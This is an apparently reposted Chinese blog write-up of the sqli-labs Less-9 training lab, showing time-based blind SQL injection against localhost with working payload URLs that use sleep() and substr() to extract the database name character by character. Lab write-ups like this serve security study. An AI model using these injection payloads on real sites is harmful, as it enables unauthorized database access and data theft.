1. 程式人生 > >【sqli-labs】 less9 GET - Blind - Time based. - Single Quotes (基於時間的GET單引號盲註)

【sqli-labs】 less9 GET - Blind - Time based. - Single Quotes (基於時間的GET單引號盲註)

mage 一個 sub inf .com info pre log ()

技術分享圖片

加and

http://localhost/sqli/Less-9/?id=1‘ and ‘1‘=‘1%23
http://localhost/sqli/Less-9/?id=1‘ and ‘1‘=‘2%23

技術分享圖片

技術分享圖片

頁面沒有變化,一瞬間沒弄懂了,看了下源碼

發現無論查詢的結果是什麽,顯示都不會有區別

技術分享圖片

學習一個函數

sleep(n) 休眠n秒

技術分享圖片

5秒後出現結果

技術分享圖片

和less8一樣是盲註漏洞,構造請求

如果數據庫名的第一個字符的ascii碼不等於114 則休眠5s

http://localhost/sqli/Less-9/?id=1‘ and if(ascii(substr(database(),1,1))=114, 0, sleep(5))%23  

瀏覽器狀態欄顯示

技術分享圖片

=115時沒有延時,可以推測第一個字符為 ‘s‘

http://localhost/sqli/Less-9/?id=1‘ and if(ascii(substr(database(),1,1))=115, 0, sleep(5))%23  

技術分享圖片

【sqli-labs】 less9 GET - Blind - Time based. - Single Quotes (基於時間的GET單引號盲註)